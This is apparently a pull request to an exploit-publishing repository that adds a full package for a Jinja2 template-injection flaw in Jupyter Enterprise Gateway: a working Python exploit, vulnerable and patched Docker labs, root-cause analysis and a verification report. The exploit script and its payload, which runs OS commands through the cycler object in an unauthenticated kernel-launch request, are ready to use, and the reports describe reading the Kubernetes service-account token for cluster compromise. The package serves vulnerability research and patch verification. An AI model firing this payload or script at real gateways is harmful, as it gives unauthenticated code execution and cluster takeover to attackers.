### PR TITLE
Add CVE-2026-44181 Jupyter Enterprise Gateway Jinja2 SSTI (RCE)

### DIFF
--- a/CVE-2026-44181/Dockerfile.patched
+++ b/CVE-2026-44181/Dockerfile.patched
@@ -1,0 +1,27 @@
+FROM python:3.11-slim
+
+ARG EG_VERSION=3.3.0
+
+RUN apt-get update && apt-get install -y --no-install-recommends curl && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN pip install --no-cache-dir jupyter_enterprise_gateway==${EG_VERSION}
+
+# Fake in-cluster Kubernetes config so k8s.py import-time
+# config.load_incluster_config() succeeds. No API server listens on
+# KUBERNETES_SERVICE_HOST:PORT - API calls after the SSTI render fail,
+# which is expected and irrelevant to the proof.
+RUN mkdir -p /var/run/secrets/kubernetes.io/serviceaccount && \
+    echo "eip-lab-fake-token" > /var/run/secrets/kubernetes.io/serviceaccount/token && \
+    echo "eip-lab-fake-ca" > /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+
+COPY assets/python_kubernetes /usr/local/share/jupyter/kernels/python_kubernetes
+
+ENV KUBERNETES_SERVICE_HOST=127.0.0.1 \
+    KUBERNETES_SERVICE_PORT=1443 \
+    EG_KERNEL_LAUNCH_TIMEOUT=5 \
+    EG_LOG_LEVEL=DEBUG
+
+EXPOSE 8888
+
+CMD ["jupyter-enterprisegateway", "--ip=0.0.0.0", "--port=8888"]

--- a/CVE-2026-44181/Dockerfile.vulnerable
+++ b/CVE-2026-44181/Dockerfile.vulnerable
@@ -1,0 +1,27 @@
+FROM python:3.11-slim
+
+ARG EG_VERSION=3.2.3
+
+RUN apt-get update && apt-get install -y --no-install-recommends curl && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN pip install --no-cache-dir jupyter_enterprise_gateway==${EG_VERSION}
+
+# Fake in-cluster Kubernetes config so k8s.py import-time
+# config.load_incluster_config() succeeds. No API server listens on
+# KUBERNETES_SERVICE_HOST:PORT - API calls after the SSTI render fail,
+# which is expected and irrelevant to the proof.
+RUN mkdir -p /var/run/secrets/kubernetes.io/serviceaccount && \
+    echo "eip-lab-fake-token" > /var/run/secrets/kubernetes.io/serviceaccount/token && \
+    echo "eip-lab-fake-ca" > /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+
+COPY assets/python_kubernetes /usr/local/share/jupyter/kernels/python_kubernetes
+
+ENV KUBERNETES_SERVICE_HOST=127.0.0.1 \
+    KUBERNETES_SERVICE_PORT=1443 \
+    EG_KERNEL_LAUNCH_TIMEOUT=5 \
+    EG_LOG_LEVEL=DEBUG
+
+EXPOSE 8888
+
+CMD ["jupyter-enterprisegateway", "--ip=0.0.0.0", "--port=8888"]

--- a/CVE-2026-44181/README.md
+++ b/CVE-2026-44181/README.md
@@ -1,0 +1,88 @@
+# CVE-2026-44181 — Jupyter Enterprise Gateway Jinja2 SSTI (RCE)
+
+> Published by the Exploit Intelligence Platform (EIP). Intel sourced from the EIP corpus;
+> PoC and lab authored and verified by EIP.
+
+## Vulnerability Summary
+
+| Field | Value |
+|---|---|
+| CVE | CVE-2026-44181 (GHSA-f49j-v924-fx9w) |
+| Component | Jupyter Enterprise Gateway — Kubernetes process proxy |
+| CWE | CWE-1336 — Improper Neutralization of Special Elements Used in a Template Engine |
+| CVSS | 10.0 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
+| EPSS | 0.701% |
+| Affected versions | jupyter_enterprise_gateway >= 2.0.0rc2, < 3.3.0 |
+| Fix | 3.3.0 (commit 1e6b2f3, PR #1412) |
+| Author | Exploit Intelligence Platform |
+| Date | 2026-08-10 |
+
+## Vulnerability Details
+
+Enterprise Gateway's Kubernetes process proxy determines the kernel pod name from the
+client-supplied `KERNEL_POD_NAME` environment variable. In vulnerable versions,
+`KubernetesProcessProxy._determine_kernel_pod_name`
+(`enterprise_gateway/services/processproxies/k8s.py`) renders any value containing `{{`/`}}`
+with a full, unsandboxed Jinja2 `Environment.from_string(pod_name).render(**keywords)`.
+
+The gateway's default configuration enforces **no authentication**, so any client that can
+reach `POST /api/kernels` can inject Jinja2 expressions and execute arbitrary Python and OS
+commands inside the gateway process. In a real Kubernetes deployment this code runs with the
+gateway's service account, enabling service-account token theft, secret access, and full
+cluster compromise (privileged pod / hostPath scheduling).
+
+## Attack Chain
+
+1. `POST /api/kernels` with body
+   `{"name": "python_kubernetes", "env": {"KERNEL_POD_NAME": "<jinja payload>"}}` — the
+   `env` dict is accepted for all `KERNEL_*` keys without authentication.
+2. `launch_process` → `_determine_kernel_pod_name` renders the payload through Jinja2
+   **before any Kubernetes API call** — no reachable cluster is required for the injection.
+3. The payload `{{ cycler.__init__.__globals__['os'].popen('<cmd>').read() }}` escapes via
+   Jinja2's default-namespace `cycler` object (whose `__init__.__globals__` contains `os`),
+   executing the command in the gateway process.
+4. The rendered output becomes the pod name and, when no `KERNEL_NAMESPACE` is set, the
+   namespace — the gateway's `Error occurred creating namespace '<output>'` error response
+   echoes the command output back to the attacker (HTTP-only oracle).
+
+The same sink is reachable through Spark Operator CRD kernelspecs
+(`CustomResourceProcessProxy` inherits the vulnerable method unmodified).
+
+## Fix Analysis
+
+Commit 1e6b2f3 removes the Jinja2 render entirely. `_safe_template_substitute` substitutes
+only bare `{{ variable_name }}` patterns via regex; any residual `{{ }}` (expressions,
+filters, attribute access, nested or second-order templates) is rejected and the pod name
+falls back to `<username>-<kernel_id>`. There is no remaining template evaluation path.
+A 6-candidate bypass battery fired against the patched build held in all cases.
+
+## Lab
+
+Self-contained Docker lab in this directory (see `lab_build_report.md` for build details):
+
+```bash
+docker compose up -d --build                 # vulnerable 3.2.3 on :8888
+bash seed.sh 8888
+python3 poc/poc.py 127.0.0.1 8888            # expect [SUCCESS]
+
+docker compose -p cve-2026-44181-control -f docker-compose.control.yml up -d --build
+python3 poc/poc.py 127.0.0.1 8889            # expect [FAILED] (patched 3.3.0)
+```
+
+The lab uses a fake in-cluster Kubernetes configuration so the gateway's Kubernetes proxy
+loads without a cluster; the SSTI render executes before the first Kubernetes API call, so
+the proof is unaffected by the absent API server.
+
+## Files
+
+- `poc/poc.py` — the exploit (Python 3, stdlib only)
+- `Dockerfile.vulnerable` / `Dockerfile.patched` — vulnerable (3.2.3) and patched (3.3.0) builds
+- `docker-compose.yml` / `docker-compose.control.yml` — lab and control environments
+- `assets/python_kubernetes/` — Kubernetes-mode kernelspec (triggers the vulnerable proxy)
+- `intel_brief.md`, `vulnerability_analysis.md`, `poc_verification_report.md`, `lab_build_report.md`
+
+## References
+
+- https://github.com/jupyter-server/enterprise_gateway/security/advisories/GHSA-f49j-v924-fx9w
+- https://github.com/jupyter-server/enterprise_gateway/releases/tag/v3.3.0
+- Patch: https://github.com/jupyter-server/enterprise_gateway/commit/1e6b2f35497682e6581c48cc6d273644d32ab89e

--- a/CVE-2026-44181/assets/python_kubernetes/kernel.json
+++ b/CVE-2026-44181/assets/python_kubernetes/kernel.json
@@ -1,0 +1,26 @@
+{
+  "language": "python",
+  "display_name": "Python on Kubernetes",
+  "metadata": {
+    "process_proxy": {
+      "class_name": "enterprise_gateway.services.processproxies.k8s.KubernetesProcessProxy",
+      "config": {
+        "image_name": "elyra/kernel-py:dev"
+      }
+    },
+    "debugger": true
+  },
+  "env": {},
+  "argv": [
+    "python",
+    "/usr/local/share/jupyter/kernels/python_kubernetes/scripts/launch_kubernetes.py",
+    "--RemoteProcessProxy.kernel-id",
+    "{kernel_id}",
+    "--RemoteProcessProxy.port-range",
+    "{port_range}",
+    "--RemoteProcessProxy.response-address",
+    "{response_address}",
+    "--RemoteProcessProxy.public-key",
+    "{public_key}"
+  ]
+}

--- a/CVE-2026-44181/docker-compose.control.yml
+++ b/CVE-2026-44181/docker-compose.control.yml
@@ -1,0 +1,14 @@
+services:
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.patched
+    image: cve-2026-44181-control:local
+    ports:
+      - "${CONTROL_PORT:-8889}:8888"
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost:8888/api || exit 1"]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+      start_period: 30s

--- a/CVE-2026-44181/docker-compose.yml
+++ b/CVE-2026-44181/docker-compose.yml
@@ -1,0 +1,14 @@
+services:
+  web:
+    build:
+      context: .
+      dockerfile: Dockerfile.vulnerable
+    image: cve-2026-44181-lab:local
+    ports:
+      - "${WEB_PORT:-8888}:8888"
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost:8888/api || exit 1"]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+      start_period: 30s

--- a/CVE-2026-44181/intel_brief.md
+++ b/CVE-2026-44181/intel_brief.md
@@ -1,0 +1,48 @@
+# Intel Brief — CVE-2026-44181
+
+## Overview
+
+| Field | Value |
+|---|---|
+| CVE ID | CVE-2026-44181 |
+| Title | Jupyter Enterprise Gateway: Jinja2 Template Server Side Template Injection results in Remote Code Execution |
+| Affected software | Jupyter Enterprise Gateway |
+| Vendor | jupyter-server (Jupyter Development Team) |
+| CVSS | 10.0 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
+| EPSS | 0.701% (percentile 0.498) |
+| CWE | CWE-1336 (Improper Neutralization of Special Elements Used in a Template Engine) |
+| Published | 2026-07-16 |
+| Exploited in the wild | Not listed (CISA KEV: no; VulnCheck KEV: no; EIP reported-exploitation: none) |
+| Other IDs | GHSA-f49j-v924-fx9w |
+
+*Source: EIP corpus (cvelistV5 via GitHub_M, EPSS), retrieved 2026-08-10.*
+
+## Affected versions
+
+| Branch | Vulnerable range | Patched version |
+|---|---|---|
+| 2.x–3.x | >= 2.0.0rc2, < 3.3.0 (last vulnerable: 3.2.3) | 3.3.0 |
+
+PyPI package: `jupyter_enterprise_gateway`, ECOSYSTEM range introduced=2.0.0rc2, fixed=3.3.0.
+
+## Description
+
+Jupyter Enterprise Gateway launches remote Jupyter kernels across distributed clusters
+(Apache Spark, Kubernetes, Docker Swarm). In versions 2.0.0rc2 through 3.2.3, the
+`KERNEL_POD_NAME` environment variable supplied in a kernel-launch request is rendered as a
+full Jinja2 template when the Kubernetes process proxy determines the kernel pod name. An
+unauthenticated attacker who can reach the gateway's REST API (`POST /api/kernels`) can inject
+Jinja2 expressions and execute arbitrary Python code and OS commands inside the Enterprise
+Gateway service. In a Kubernetes deployment this code runs with the gateway's service account,
+enabling theft of the service account token, access to Kubernetes secrets, and full cluster
+compromise via privileged pods or hostPath mounts.
+
+## Root cause summary
+
+`KubernetesProcessProxy._determine_kernel_pod_name`
+(`enterprise_gateway/services/processproxies/k8s.py`) passed the attacker-controlled
+`KERNEL_POD_NAME` value to `jinja2.Environment(loader=BaseLoader(), autoescape=True)
+.from_string(pod_name).render(**keywords)` — an unsandboxed server-side template evaluation.
+The fix in 3.3.0 (commit 1e6b2f3, PR #1412) replaces the Jinja2 render with a strict
+regex-based `{{ variable_name }}` substitution that rejects any expression syntax and falls
+back to the default pod name.

--- a/CVE-2026-44181/lab_build_report.md
+++ b/CVE-2026-44181/lab_build_report.md
@@ -1,0 +1,32 @@
+# Lab Build Report — CVE-2026-44181
+
+## Environments
+
+| Environment | Project | Image | Host port | URL | Version |
+|---|---|---|---|---|---|
+| Vulnerable | cve-2026-44181-lab | cve-2026-44181-lab:local | 20362 | http://127.0.0.1:20362 | jupyter_enterprise_gateway 3.2.3 |
+| Control | cve-2026-44181-control | cve-2026-44181-control:local | 20363 | http://127.0.0.1:20363 | jupyter_enterprise_gateway 3.3.0 |
+
+Ports derived from CVE id per doctrine (`N=202644181`, `LAB_PORT=20000+(N%4000)*2=20362`,
+`CONTROL_PORT=20363`). Both verified free before first `up`; no deviation.
+
+## Build
+
+- Base image `python:3.11-slim`; `pip install jupyter_enterprise_gateway==<ARG EG_VERSION>`.
+- Kernelspec `python_kubernetes` staged from upstream repo tag v3.2.3
+  (`etc/kernelspecs/python_kubernetes`, `image_name` placeholder set to `elyra/kernel-py:dev`).
+- Fake in-cluster Kubernetes config planted at image build
+  (`KUBERNETES_SERVICE_HOST=127.0.0.1`, `KUBERNETES_SERVICE_PORT=1443`, fake SA token/ca.crt)
+  so `k8s.py` import-time `config.load_incluster_config()` succeeds. No API server listens;
+  post-render API calls fail with connection refused — expected.
+- `EG_KERNEL_LAUNCH_TIMEOUT=5` keeps failed launches fast; `EG_LOG_LEVEL=DEBUG`.
+- No seeding required (no auth, kernelspec installed at build); `seed.sh` is a readiness gate.
+
+## Reproduce
+
+```bash
+cd lab
+docker compose up -d --build                 # vulnerable on :20362
+bash seed.sh 20362
+docker compose -p cve-2026-44181-control -f docker-compose.control.yml up -d --build  # control on :20363
+```

--- a/CVE-2026-44181/poc/poc.py
+++ b/CVE-2026-44181/poc/poc.py
@@ -1,0 +1,128 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : Jupyter Enterprise Gateway - Jinja2 SSTI Remote Code Execution
+# CVE            : CVE-2026-44181
+# Vendor         : jupyter-server
+# Product        : enterprise_gateway
+# Affected       : >= 2.0.0rc2, < 3.3.0
+# Type           : CWE-1336 - Improper Neutralization of Special Elements Used in a Template Engine
+# CVSS           : 10.0 (CRITICAL)
+# Platform       : cross-platform
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-10
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-44181 — Jupyter Enterprise Gateway KERNEL_POD_NAME Jinja2 SSTI (RCE)
+
+Enterprise Gateway's Kubernetes process proxy renders the attacker-controlled
+KERNEL_POD_NAME environment variable from the kernel-launch request with a full,
+unsandboxed Jinja2 Environment (KubernetesProcessProxy._determine_kernel_pod_name,
+k8s.py). An unauthenticated client can inject Jinja2 expressions and execute
+arbitrary Python / OS commands inside the gateway process. In a real Kubernetes
+deployment this runs with the gateway's service account, enabling cluster
+compromise.
+
+ATTACK CHAIN:
+  1. POST /api/kernels {"name": "python_kubernetes", "env": {"KERNEL_POD_NAME": "<jinja payload>"}}
+     (default gateway configuration enforces no authentication)
+  2. KubernetesProcessProxy.launch_process -> _determine_kernel_pod_name renders
+     the payload via Environment.from_string(pod_name).render(**keywords)
+  3. Payload {{ cycler.__init__.__globals__['os'].popen('<cmd>').read() }} reaches
+     os via Jinja2's default-namespace `cycler` object -> command executes
+  4. The rendered output becomes the pod name (DNS-sanitized); with no
+     KERNEL_NAMESPACE set, the pod name is used as the namespace, and the
+     gateway's "Error occurred creating namespace '<output>'" response echoes
+     the command output back to the attacker (HTTP-only oracle - no out-of-band
+     channel needed). No reachable Kubernetes API is required: the render runs
+     before the first API call.
+
+Usage: python3 exploit.py <host> <port>
+"""
+
+import json
+import random
+import re
+import sys
+import urllib.request
+
+# Jinja2's default template namespace exposes `cycler` (jinja2.utils.Cycler);
+# its __init__.__globals__ contains the module's `os` import, giving a direct,
+# version-stable path to os.popen without MRO index guessing.
+PAYLOAD_TEMPLATE = (
+    "{{{{ cycler.__init__.__globals__['os'].popen('{cmd}').read() }}}}"
+)
+
+
+def post_kernel(base, kernel_env):
+    """Fire a kernel-launch request carrying the attacker env dict; return the
+    gateway's JSON error body (launch always fails in this lab because no
+    Kubernetes API is reachable - the SSTI render happens before that call)."""
+    body = json.dumps({"name": "python_kubernetes", "env": kernel_env}).encode()
+    req = urllib.request.Request(
+        f"{base}/api/kernels", data=body,
+        headers={"Content-Type": "application/json"}, method="POST",
+    )
+    try:
+        with urllib.request.urlopen(req, timeout=30) as resp:
+            return resp.status, resp.read().decode()
+    except urllib.error.HTTPError as e:
+        # 500 is expected: render succeeded, namespace creation then failed
+        return e.code, e.read().decode()
+
+
+def namespace_from(body):
+    """Extract the namespace name the gateway tried to create - it is derived
+    from the rendered pod name, so command output shows up here."""
+    m = re.search(r"creating namespace '([^']*)'", body)
+    return m.group(1) if m else None
+
+
+def exploit(host, port):
+    base = f"http://{host}:{port}"
+
+    # Step 0: confirm the gateway and the kubernetes kernelspec are reachable
+    with urllib.request.urlopen(f"{base}/api/kernelspecs", timeout=15) as resp:
+        specs = json.loads(resp.read().decode())
+    if "python_kubernetes" not in specs.get("kernelspecs", {}):
+        print("[-] python_kubernetes kernelspec not registered - wrong lab?")
+        return False
+    print("[+] Enterprise Gateway reachable, python_kubernetes kernelspec present")
+
+    # Step 1: SSTI detection oracle - render a unique marker via echo.
+    # A non-vulnerable (fixed) build rejects expression syntax and falls back
+    # to the default pod name, so the marker never appears in the response.
+    marker = f"eip{random.randrange(16**6):06x}"
+    status, body = post_kernel(base, {"KERNEL_POD_NAME": PAYLOAD_TEMPLATE.format(cmd=f"echo {marker}")})
+    ns = namespace_from(body)
+    print(f"[*] marker probe: HTTP {status}, rendered namespace: {ns!r}")
+    if marker not in (ns or ""):
+        print("[-] marker not reflected - template was not evaluated (patched?)")
+        return False
+    print("[+] SSTI confirmed: marker was evaluated by the server-side template engine")
+
+    # Step 2: prove real OS command execution with `id` output through the
+    # same oracle (sanitized: 'uid=0(root) ...' -> 'uid-0-root-...').
+    status, body = post_kernel(base, {"KERNEL_POD_NAME": PAYLOAD_TEMPLATE.format(cmd="id")})
+    ns = namespace_from(body) or ""
+    print(f"[*] id probe: HTTP {status}, rendered namespace: {ns!r}")
+    m = re.search(r"uid-(\d+)-([a-z0-9-]+?)-gid-(\d+)", ns)
+    if not m:
+        print("[-] `id` output not observed - command execution not confirmed")
+        return False
+    print(f"[+] RCE confirmed: gateway process executed `id` as uid={m.group(1)} ({m.group(2)}) gid={m.group(3)}")
+    print("[+] Impact: arbitrary Python/OS commands run inside the Enterprise Gateway")
+    print("    service with its privileges; in a real cluster the same channel reads")
+    print("    the gateway's Kubernetes service-account token (cluster compromise).")
+    return True
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 3:
+        sys.stderr.write(f"usage: {sys.argv[0]} <host> <port>\n")
+        sys.exit(2)
+    ok = exploit(sys.argv[1], sys.argv[2])
+    print("[SUCCESS]" if ok else "[FAILED]")

--- a/CVE-2026-44181/poc_verification_report.md
+++ b/CVE-2026-44181/poc_verification_report.md
@@ -1,0 +1,34 @@
+# PoC Verification Report — CVE-2026-44181
+
+**Verdict: [SUCCESS]** — unauthenticated remote code execution via Jinja2 SSTI, reproduced
+3/3 from cold state against a fresh lab; the patched build (3.3.0) does not trigger.
+
+## Environment
+
+- Vulnerable lab: Docker (`python:3.11-slim` + `jupyter_enterprise_gateway==3.2.3`),
+  compose project `cve-2026-44181-lab`, `python_kubernetes` kernelspec, default
+  (unauthenticated) configuration, fake in-cluster Kubernetes config.
+- Control lab: identical image with `jupyter_enterprise_gateway==3.3.0`.
+- Runtime: Python 3.11.15, Jinja2 3.1.6, jupyter-server 1.24.0, tornado 6.5.8.
+
+## Verification
+
+- `python3 poc/poc.py <host> <port>` ends with `[SUCCESS]` on the vulnerable build:
+  it proves SSTI evaluation (unique marker rendered by the server) and then real OS command
+  execution (`id` output, `uid=0 root`, observed through the gateway's own error channel —
+  the rendered pod name is echoed in the "Error occurred creating namespace" response).
+- Reproducibility: **3/3** cold-state cycles (teardown → rebuild → seed → run), each `[SUCCESS]`.
+- Control run on the patched build: the same PoC ends `[FAILED]`; the gateway rejects the
+  expression and falls back to the default pod name (`root-<kernel_id>`). Impact NOT triggered.
+- Additional branch-stage evidence: file-drop proof of command execution as root, including
+  reading the Kubernetes service-account token file (the advisory's cluster-compromise chain).
+
+## Bypass & Variant Analysis (post-control)
+
+A 6-candidate bypass battery (attribute access, filters, arithmetic, nested braces,
+second-order substitution, `{% %}` statement syntax) was fired at the live 3.3.0 control
+build — every candidate was rejected or inert; the control held, so no bypass analysis ships
+with this package. Variant analysis across the full v3.2.3 tree found exactly one template
+render sink (the patched one) and one additional deployment vehicle for the same code
+(Spark Operator CRD kernelspecs inherit the same method; fixed by the same commit). No new
+CVE candidates.

--- a/CVE-2026-44181/seed.sh
+++ b/CVE-2026-44181/seed.sh
@@ -1,0 +1,16 @@
+#!/bin/bash
+# CVE-2026-44181 lab seed: nothing to seed - the gateway runs unauthenticated
+# by default and the kubernetes kernelspec is installed at image build time.
+# This script only confirms readiness.
+set -euo pipefail
+PORT="${1:-${WEB_PORT:-20362}}"
+for i in $(seq 1 30); do
+  if curl -sf "http://127.0.0.1:${PORT}/api" > /dev/null 2>&1; then
+    echo "[+] Enterprise Gateway ready at http://127.0.0.1:${PORT}"
+    curl -s "http://127.0.0.1:${PORT}/api/kernelspecs" | head -c 400; echo
+    exit 0
+  fi
+  sleep 1
+done
+echo "[-] TIMEOUT waiting for gateway" >&2
+exit 1

--- a/CVE-2026-44181/vulnerability_analysis.md
+++ b/CVE-2026-44181/vulnerability_analysis.md
@@ -1,0 +1,60 @@
+# Vulnerability Analysis — CVE-2026-44181
+
+## Root-cause trace (entrypoint to sink)
+
+1. **Entrypoint**: `POST /api/kernels` — the Enterprise Gateway REST API accepts a JSON body
+   of `{"name": <kernelspec>, "env": {...}}`. By default the gateway runs with **no
+   authentication**: `CorruptTokenCheckMixin`/`mixins.py` enforces `eg_auth_token` only when
+   one is configured, and the default (`EG_AUTH_TOKEN` unset) is an empty string
+   (`enterprise_gateway/mixins.py:97-106`, `_auth_token_default` at mixins.py:221-223).
+2. **Env propagation**: the request's `env` dict flows into the kernel launch kwargs. Any
+   `KERNEL_*` key is user-controlled; `KERNEL_POD_NAME` is a documented, supported variable
+   (docs/source/users/kernel-envs.md).
+3. **Proxy selection**: the `python_kubernetes` kernelspec declares
+   `metadata.process_proxy.class_name =
+   enterprise_gateway.services.processproxies.k8s.KubernetesProcessProxy`, so launching that
+   kernel routes into the Kubernetes process proxy.
+4. **Sink**: `KubernetesProcessProxy.launch_process` calls
+   `self._determine_kernel_pod_name(**kwargs)` (k8s.py:70 @ v3.2.3). When the supplied pod
+   name contains `{{` and `}}`, the code builds
+   `Environment(loader=BaseLoader(), autoescape=True)` and calls
+   `env.from_string(pod_name).render(**keywords)` (k8s.py:232-236 @ v3.2.3) — a full,
+   unsandboxed Jinja2 render of attacker-controlled input. Jinja2's default namespace exposes
+   `cycler`, `joiner`, and `namespace`, whose `__init__.__globals__` include `os`, yielding
+   arbitrary command execution in the gateway process (e.g.
+   `{{ cycler.__init__.__globals__.os.popen('id').read() }}`).
+5. **Post-sink**: the rendered string is DNS-sanitized (`re.sub("[^0-9a-z]+", "-", ...)`)
+   *after* rendering, so payload output never needs to survive the sanitizer — code has
+   already executed. No Kubernetes API reachability is required for the injection itself;
+   the render precedes the first API call.
+
+## Fix assessment (v3.3.0, commit 1e6b2f3, PR #1412)
+
+- Removes the `jinja2` import from k8s.py entirely.
+- Adds `_safe_template_substitute(template_str, variables)`: regex
+  `\{\{\s*([a-zA-Z][a-zA-Z0-9_]*)\s*\}\}` substitutes only bare variable names; any residual
+  `{{ ... }}` (expressions, attribute access, filters) logs a warning and returns `None`.
+- `_determine_kernel_pod_name` falls back to the default `<username>-<kernel_id>` pod name
+  when substitution returns `None`.
+
+The fix eliminates template evaluation rather than sandboxing it — no Jinja2 render of
+user-controlled input remains. Test coverage added in
+`enterprise_gateway/tests/test_process_proxy.py`.
+
+## Adjacent fix (not this CVE)
+
+Release 3.3.0 also ships commit `2258a41` ("Fix YAML injection via KERNEL_* env vars",
+GHSA-cfw7-6c5v-2wjq) — a separate vulnerability in the Kubernetes manifest YAML
+construction, tracked separately (CVE-2026-44182).
+
+## Verification status
+
+[VERIFIED IN LAB] Reachability and impact confirmed against a live lab: an unauthenticated
+`POST /api/kernels` with a Jinja2 `KERNEL_POD_NAME` payload executed `id` as root inside the
+gateway container (output observed through the gateway's own "Error occurred creating
+namespace" error channel; separately proven by file drop including reading the
+service-account token file). Reproduced 3/3 from cold state. The patched 3.3.0 build rejects
+the payload and falls back to the default pod name. A second deployment vehicle for the same
+code was confirmed in source: `CustomResourceProcessProxy` (Spark Operator CRD kernelspecs)
+inherits the vulnerable method unmodified and is fixed by the same commit. See
+poc_verification_report.md.

--- a/README.md
+++ b/README.md
@@ -25,6 +25,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-65887](CVE-2026-65887/) | Balbooa Gridbox (Joomla) | Unauthenticated Arbitrary Password Reset | **10.0** | **Yes** — 2.20.2 fix leaks the reset code in the JSON response; full ATO still reachable |
 | [CVE-2026-45336](CVE-2026-45336/) | HireFlow | Hard-coded Flask secret_key Auth Bypass | **10.0** | **Yes** — v1.3 "fix" never removed the key; auth/IDOR/CSRF all fall |
 | [CVE-2026-46339](CVE-2026-46339/) | 9router | Unauthenticated RCE via Unprotected MCP Custom Plugin Routes | **10.0** | No |
+| [CVE-2026-44181](CVE-2026-44181/) | Jupyter Enterprise Gateway | Jinja2 SSTI (RCE) | **10.0** | No |
 | [CVE-2026-30860](CVE-2026-30860/) | WeKnora | SQL Injection Bypass (ARRAY/ROW AST) to RCE | **9.9** | No |
 | [CVE-2026-30861](CVE-2026-30861/) | WeKnora | OS Command Injection (MCP `-p` Flag Bypass) | **9.9** | No |
 | [CVE-2026-1868](CVE-2026-1868/) | GitLab AI Gateway | SSTI to DoS/Code Execution | **9.9** | **Yes** — filter abuse + `%` operator bypass patched sandbox |
@@ -119,7 +120,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-64608](CVE-2026-64608/) | Apache Fory (C++) | Compatible-Mode Heap Type Confusion | **9.8** | No |
 | [CVE-2025-59060](CVE-2025-59060/) | Apache Ranger | Apache Ranger TLS Hostname Verification Bypass | **N/A** | No |
 
-23 out of 105 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
+23 out of 106 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
 
 ---
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-44181.

- Jupyter Enterprise Gateway — Jinja2 SSTI (RCE)
- CVSS 10.0; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.